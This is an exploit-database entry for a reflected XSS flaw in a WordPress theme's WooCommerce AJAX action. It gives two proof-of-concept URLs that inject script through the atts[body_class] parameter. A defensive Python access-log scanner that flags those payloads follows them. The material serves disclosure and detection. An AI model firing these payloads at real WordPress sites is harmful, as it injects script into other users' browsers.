## https://sploitus.com/exploit?id=WPEX-ID:F56F7244-E8EC-4A87-9419-643BC13B45A0
Install and activate the dependencies: a premium theme (or the teta-lite one), as well as the WooCommerce plugin, then open the URL below as either an unauthenticated or an authenticated user.

v < 2.3 - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&atts[body_class]=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

v < 2.3.1 (will only work against unauthenticated users, as a nonce is needed) - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&kite_nonce=xxxxx&atts[body_class]=%22onmouseover=alert(/XSS/)//
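
A defender-side check for the two request patterns above, as an added example that is not part of the original advisory: it scans access-log lines for the `fetch_woocommerce_products_loop` action and flags any `atts[body_class]` value that is not a plain list of class names. The log lines are constructed samples, and the class-name allow-list and the combined-log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Action and parameter names are taken from the PoC URLs on this page.
ACTION = "fetch_woocommerce_products_loop"
PARAM = "atts[body_class]"
# Assumption: a legitimate body_class is a space-separated list of CSS class names.
SAFE_CLASS = re.compile(r"[A-Za-z0-9_\- ]*")
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&atts[body_class]=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&atts%5Bbody_class%5D=home+shop-page HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&kite_nonce=xxxxx&atts[body_class]=%22onmouseover=alert(/XSS/)// HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&atts[body_class]=%22%3E HTTP/1.1" 200 64',
]

def suspicious_body_class(target):
    """Return the decoded body_class value if it is not a plain class list, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qsl percent-decodes keys and values, so atts%5Bbody_class%5D matches too.
    params = parse_qsl(parts.query, keep_blank_values=True)
    if ("action", ACTION) not in params:
        return None
    for key, value in params:
        if key == PARAM and not SAFE_CLASS.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = suspicious_body_class(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check only covers parameters sent in the query string; the same action submitted as a POST body would need the request body to be logged and parsed the same way.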